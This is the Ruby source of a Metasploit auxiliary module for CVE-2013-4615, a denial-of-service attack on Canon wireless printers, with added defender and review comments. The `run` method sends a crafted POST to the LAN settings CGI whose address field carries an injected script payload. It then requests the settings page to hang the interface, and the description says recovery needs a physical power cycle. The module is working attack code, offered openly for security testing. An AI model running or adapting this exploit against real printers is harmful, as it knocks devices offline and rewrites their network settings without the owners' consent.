GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/canon_wireless_printer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
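# Auxiliary module for CVE-2013-4615: the HTTP management interface of the
# affected Canon wireless printers stops answering after a LAN settings
# request that carries a non-numeric address octet.
#
# Defender view: the two requests below set no credentials in this module,
# so the practical mitigations are keeping the printer's management
# interface off untrusted networks and applying vendor firmware updates.
# On the wire the pattern is a POST to the LAN settings CGI whose
# LAN_TXT24 field is not a plain number, followed by a GET of the LAN
# settings page.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, description, references and
  # stability notes) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework and merged
  #   through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Canon Wireless Printer Denial Of Service',
        'Description' => %q{
          The HTTP management interface on several models of Canon Wireless printers
          allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:
          if this module is successful, the device can only be recovered with a physical
          power cycle.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
        'References' => [
          [ 'CVE', '2013-4615' ],
          [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
        ],
        'DisclosureDate' => '2013-06-18',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          # NOTE(review): #run describes its first request as setting a new
          # IP on the device, which reads like a configuration change.
          # Confirm whether this list should declare that side effect.
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Probes the HTTP management interface with a plain GET of "/".
  #
  # @return [Boolean] true when send_request_raw handed back a response
  #   within its 10 second timeout, false when it returned nil
  def is_alive?
    res = send_request_raw({
      'method' => 'GET',
      'uri' => '/'
    }, 10)

    !res.nil?
  end

  # Sends the two-request sequence and reports whether the HTTP interface
  # still answers afterwards.
  #
  # A baseline probe runs first. Without it, an interface that was already
  # unreachable or hung would fail the final probe and be reported as a
  # successful crash, which is a false positive for whoever reads the
  # assessment output.
  #
  # @return [void]
  def run
    unless is_alive?
      print_error("#{rhost}:#{rport} - No response from the HTTP interface before testing, skipping")
      return
    end

    begin
      # The first request will set the new IP. The last address octet
      # (LAN_TXT24) carries markup instead of a number.
      send_request_cgi({
        'method' => 'POST',
        'uri' => '/English/pages_MacUS/cgi_lan.cgi',
        'data' => 'OK.x=61' \
                  '&OK.y=12' \
                  '&LAN_OPT1=2' \
                  '&LAN_TXT1=Wireless' \
                  '&LAN_OPT3=1' \
                  '&LAN_TXT21=192' \
                  '&LAN_TXT22=168' \
                  '&LAN_TXT23=1' \
                  '&LAN_TXT24=114"><script>alert(\'xss\');</script>' \
                  '&LAN_TXT31=255' \
                  '&LAN_TXT32=255' \
                  '&LAN_TXT33=255' \
                  '&LAN_TXT34=0' \
                  '&LAN_TXT41=192' \
                  '&LAN_TXT42=168' \
                  '&LAN_TXT43=1' \
                  '&LAN_TXT44=1' \
                  '&LAN_OPT2=4' \
                  '&LAN_OPT4=1' \
                  '&LAN_HID1=1'
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      # NOTE(review): the HttpClient request helpers may return nil instead
      # of raising these errors; the baseline probe above covers that case.
      print_error("Couldn't connect to #{rhost}:#{rport}")
      return
    end

    # The second request will load the network options page, which seems to trigger the DoS
    send_request_cgi({
      'method' => 'GET',
      'uri' => '/English/pages_MacUS/lan_set_content.html'
    }, 5) # explicit 5 second timeout; the response itself is not used

    # Check to see if it worked or not. is_alive? only tells us that no
    # response came back, so the "Connection Refused" wording below can
    # also describe a timeout.
    if is_alive?
      print_error("#{rhost}:#{rport} - Server is still alive")
    else
      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
    end
  end
end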